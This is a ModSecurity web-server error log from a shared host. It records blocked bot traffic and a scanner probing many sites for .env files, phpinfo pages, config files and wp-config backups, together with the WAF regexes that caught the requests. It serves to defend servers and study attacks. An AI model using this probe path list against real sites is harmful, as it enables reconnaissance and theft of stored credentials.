[Tue May 26 13:29:54.582984 2026] [security2:error] [pid 512745:tid 512882] [client 34.147.88.45:32768] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "webdisk.consultrgb.com"] [uri "/"] [unique_id "ahVS-nKSB_s2CvZg7xNrsgAAARE"]
[Tue May 26 13:29:56.030903 2026] [security2:error] [pid 512745:tid 512979] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS-3KSB_s2CvZg7xNrwwAAAXI"]
[Tue May 26 13:29:57.393612 2026] [security2:error] [pid 512745:tid 512983] [client 74.7.175.190:49702] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.knightmasonsssea.org.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVS_XKSB_s2CvZg7xNr1wABdlg"]
[Tue May 26 13:29:57.924784 2026] [security2:error] [pid 512745:tid 512972] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVS_XKSB_s2CvZg7xNr2QAAAWs"]
[Tue May 26 13:30:01.259317 2026] [security2:error] [pid 512745:tid 512963] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTAHKSB_s2CvZg7xNr_wAAAWI"]
[Tue May 26 13:30:02.185889 2026] [security2:error] [pid 512344:tid 512569] [client 104.252.247.126:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVTAcbElyei4S77DQcCsQAAAF8"]
[Tue May 26 13:30:02.512724 2026] [security2:error] [pid 512344:tid 512499] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTAcbElyei4S77DQcCwQAAABk"]
[Tue May 26 13:30:02.652527 2026] [security2:error] [pid 512745:tid 512751] [remote 216.185.214.209:45358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVTAnKSB_s2CvZg7xNsDwABJAU"]
[Tue May 26 13:30:03.304208 2026] [security2:error] [pid 512344:tid 512345] [remote 37.187.156.42:40442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVTA8bElyei4S77DQcC0wAAWAA"]
[Tue May 26 13:30:04.814001 2026] [security2:error] [pid 512344:tid 512580] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTBMbElyei4S77DQcC6AAAAGo"]
[Tue May 26 13:30:05.494951 2026] [security2:error] [pid 512344:tid 512374] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/.env.php"] [unique_id "ahVTBcbElyei4S77DQcDGQAAKR0"]
[Tue May 26 13:30:06.239777 2026] [security2:error] [pid 512344:tid 512450] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVTBsbElyei4S77DQcDdAAAYWk"]
[Tue May 26 13:30:06.579424 2026] [security2:error] [pid 512344:tid 512550] [client 14.191.131.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTBsbElyei4S77DQcDYQAAAEw"]
[Tue May 26 13:30:06.687661 2026] [security2:error] [pid 512344:tid 512474] [client 114.119.138.130:52429] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/homepages/portfolio-agency/&cookie=n"] [unique_id "ahVTBsbElyei4S77DQcDrAAAAAA"], referer: https://www.fisher-shop.de/shop.pl?product=show&id=metfi22-a&link=schatzsuchen.de%40https%3A//www.anujtradingco.com/homepages/portfolio-agency/
[Tue May 26 13:30:06.694654 2026] [security2:error] [pid 512344:tid 512358] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVTBsbElyei4S77DQcDrQAAJg0"]
[Tue May 26 13:30:06.904132 2026] [security2:error] [pid 512344:tid 512388] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVTBsbElyei4S77DQcDwgAAEis"]
[Tue May 26 13:30:06.933150 2026] [security2:error] [pid 512344:tid 512392] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVTBsbElyei4S77DQcDxgAAWy8"]
[Tue May 26 13:30:06.992327 2026] [security2:error] [pid 512344:tid 512560] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTBsbElyei4S77DQcDmAAAAFY"]
[Tue May 26 13:30:07.132753 2026] [security2:error] [pid 512344:tid 512436] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/api/info.php"] [unique_id "ahVTB8bElyei4S77DQcD2AAACFs"]
[Tue May 26 13:30:07.170402 2026] [security2:error] [pid 512344:tid 512413] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/api/phpinfo.php"] [unique_id "ahVTB8bElyei4S77DQcD3QAACEQ"]
[Tue May 26 13:30:08.230686 2026] [security2:error] [pid 512344:tid 512401] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config.php"] [unique_id "ahVTCMbElyei4S77DQcEUwAAADg"]
[Tue May 26 13:30:08.341417 2026] [security2:error] [pid 512344:tid 512406] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/aws.php"] [unique_id "ahVTCMbElyei4S77DQcEYgAANT0"]
[Tue May 26 13:30:08.375979 2026] [security2:error] [pid 512344:tid 512405] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/config.inc.php"] [unique_id "ahVTCMbElyei4S77DQcEZQAAXTw"]
[Tue May 26 13:30:08.402380 2026] [security2:error] [pid 512344:tid 512362] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/config.php"] [unique_id "ahVTCMbElyei4S77DQcEaAAAXRE"]
[Tue May 26 13:30:08.462150 2026] [security2:error] [pid 512344:tid 512415] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/env.php"] [unique_id "ahVTCMbElyei4S77DQcEbQAAPkY"]
[Tue May 26 13:30:08.488677 2026] [security2:error] [pid 512344:tid 512387] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/nexmo.php"] [unique_id "ahVTCMbElyei4S77DQcEcAAAMSo"]
[Tue May 26 13:30:08.495992 2026] [security2:error] [pid 512344:tid 512396] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/module.config.php"] [unique_id "ahVTCMbElyei4S77DQcEcwAAWDM"]
[Tue May 26 13:30:08.553041 2026] [security2:error] [pid 512344:tid 512425] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config/stripe.php"] [unique_id "ahVTCMbElyei4S77DQcEewAAc1A"]
[Tue May 26 13:30:09.212253 2026] [security2:error] [pid 512344:tid 512367] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/info.php"] [unique_id "ahVTCcbElyei4S77DQcEwQAALBY"]
[Tue May 26 13:30:09.221754 2026] [security2:error] [pid 512344:tid 512372] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/infophp.php"] [unique_id "ahVTCcbElyei4S77DQcEwgAAfBs"]
[Tue May 26 13:30:09.226943 2026] [security2:error] [pid 512344:tid 512371] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/infos.php"] [unique_id "ahVTCcbElyei4S77DQcEwwAATBo"]
[Tue May 26 13:30:09.720985 2026] [security2:error] [pid 512344:tid 512412] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php-info.php"] [unique_id "ahVTCcbElyei4S77DQcE9AAACkM"]
[Tue May 26 13:30:09.728684 2026] [security2:error] [pid 512344:tid 512435] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php.php"] [unique_id "ahVTCcbElyei4S77DQcE9QAAaFo"]
[Tue May 26 13:30:09.739158 2026] [security2:error] [pid 512745:tid 512987] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTCXKSB_s2CvZg7xNsUAAAAXo"]
[Tue May 26 13:30:09.752711 2026] [security2:error] [pid 512344:tid 512387] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/php_info.php"] [unique_id "ahVTCcbElyei4S77DQcE9gAAHio"]
[Tue May 26 13:30:09.771065 2026] [security2:error] [pid 512344:tid 512396] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahVTCcbElyei4S77DQcE-AAAKTM"]
[Tue May 26 13:30:09.875059 2026] [security2:error] [pid 512745:tid 512971] [client 176.65.139.232:51528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "pestcontroldelhi.co.in"] [uri "/.env"] [unique_id "ahVTCXKSB_s2CvZg7xNsWwAAAWo"]
[Tue May 26 13:30:09.921283 2026] [security2:error] [pid 512344:tid 512445] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/public/phpinfo.php"] [unique_id "ahVTCcbElyei4S77DQcFCAAARWQ"]
[Tue May 26 13:30:11.079105 2026] [security2:error] [pid 512344:tid 512437] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/test.php"] [unique_id "ahVTC8bElyei4S77DQcFhQAAXVw"]
[Tue May 26 13:30:11.915361 2026] [security2:error] [pid 512344:tid 512561] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTC8bElyei4S77DQcFowAAAFc"]
[Tue May 26 13:30:12.636534 2026] [security2:error] [pid 512344:tid 512459] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php"] [unique_id "ahVTDMbElyei4S77DQcFvwAATHI"]
[Tue May 26 13:30:12.640448 2026] [security2:error] [pid 512344:tid 512355] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.bak"] [unique_id "ahVTDMbElyei4S77DQcFwAAATAo"]
[Tue May 26 13:30:12.649460 2026] [security2:error] [pid 512344:tid 512353] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.new"] [unique_id "ahVTDMbElyei4S77DQcFwQAAWgg"]
[Tue May 26 13:30:12.779648 2026] [security2:error] [pid 512344:tid 512474] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVTC8bElyei4S77DQcFfwAAAFo"]
[Tue May 26 13:30:12.988130 2026] [security2:error] [pid 512745:tid 512881] [client 45.148.10.95:19280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVTDHKSB_s2CvZg7xNsjwAAARA"]
[Tue May 26 13:30:12.992706 2026] [security2:error] [pid 512344:tid 512467] [remote 45.148.10.95:47848] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.ndequipments.com"] [uri "/wp-config.php.old"] [unique_id "ahVTDMbElyei4S77DQcFzQAAPno"]
[Tue May 26 13:30:13.043550 2026] [security2:error] [pid 512344:tid 512541] [client 45.148.10.95:19378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/*update.cgi*"] [unique_id "ahVTDcbElyei4S77DQcFzgAAAEM"]
[Tue May 26 13:30:13.049616 2026] [security2:error] [pid 512344:tid 512482] [client 45.148.10.95:19334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVTDcbElyei4S77DQcF0QAAAAg"]
[Tue May 26 13:30:13.228927 2026] [security2:error] [pid 512344:tid 512516] [client 45.148.10.95:19378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.docker/.env"] [unique_id "ahVTDcbElyei4S77DQcF1gAAACo"]
[Tue May 26 13:30:13.236791 2026] [security2:error] [pid 512745:tid 512892] [client 45.148.10.95:19362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.docker/laravel/app/.env"] [unique_id "ahVTDXKSB_s2CvZg7xNsnAAAARs"]
[Tue May 26 13:30:13.254386 2026] [security2:error] [pid 512745:tid 512918] [client 45.148.10.95:19316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVTDXKSB_s2CvZg7xNsnwAAATU"]
[Tue May 26 13:30:13.326274 2026] [security2:error] [pid 512344:tid 512582] [client 45.148.10.95:19336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVTDcbElyei4S77DQcF3QAAAGw"]
[Tue May 26 13:30:13.341553 2026] [security2:error] [pid 512745:tid 512939] [client 45.148.10.95:19390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVTDXKSB_s2CvZg7xNsowAAAUo"]
[Tue May 26 13:30:13.499209 2026] [security2:error] [pid 512745:tid 512905] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTDXKSB_s2CvZg7xNskwAAASg"]
[Tue May 26 13:30:13.522922 2026] [security2:error] [pid 512344:tid 512543] [client 45.148.10.95:19274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVTDcbElyei4S77DQcF4QAAAEU"]
[Tue May 26 13:30:13.583867 2026] [security2:error] [pid 512344:tid 512513] [client 45.148.10.95:19378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/.env.php"] [unique_id "ahVTDcbElyei4S77DQcF5gAAACc"]
